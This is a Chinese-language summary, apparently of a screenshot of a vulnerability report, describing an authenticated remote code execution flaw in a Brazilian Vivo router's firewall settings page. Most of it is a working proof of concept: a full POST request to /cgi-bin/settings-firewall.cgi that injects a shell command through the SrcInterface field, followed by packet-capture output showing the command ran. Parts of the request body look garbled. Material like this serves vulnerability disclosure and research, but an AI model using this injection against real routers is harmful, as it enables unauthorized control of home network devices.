从这个网页截图中,可以获取到以下关于漏洞的关键信息: 1. 漏洞描述: - 漏洞类型:Vivo Brazilian router存在一个认证远程代码执行漏洞。 - 受影响组件:firewall settings page。 - 漏洞利用:通过POST请求到/cgi-bin/settings-firewall.cgi,可以执行远程代码。 2. 漏洞利用方法: - 请求头: - Host: 192.168.15.1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 - Accept: text/html, / - Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate, br - Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest - Content-Length: 273 - Origin: http://192.168.15.1 - Connection: keep-alive - Referer: http://192.168.15.1/cgi-bin/settings-firewall.cgi - Cookie: COOKIE_SESSION_KEY=8cc78d1a049bbc63f372d8cfec6886d1 - Priority: u=0 - 请求体: - editflag=1&editIndex=0&Order=1&RuleName=teste&Protocol=TCP&IcmpType=ICmpv6Type=IPVersion=4&SrcInterface=br0;ping - 192.168.15.123;Target=Accept&ActionValue=Local&LocalPort=80&LocalPortRangeMax=&LocalIP=192.168.15.1&RemotePort=80&RemotePortRangeMax=&RemoteMask=192.168.15.2 3. 漏洞利用结果: - 响应: - ICMP echo request, id 2726, seq 98, length 64 - ICMP echo reply, id 2726, seq 98, length 64 - ICMP echo request, id 2726, seq 99, length 64 - ICMP echo reply, id 2726, seq 99, length 64 - ICMP echo request, id 2726, seq 100, length 64 - ICMP echo reply, id 2726, seq 100, length 64 这些信息表明,通过特定的POST请求和相应的请求头,可以触发Vivo Brazilian router的远程代码执行漏洞。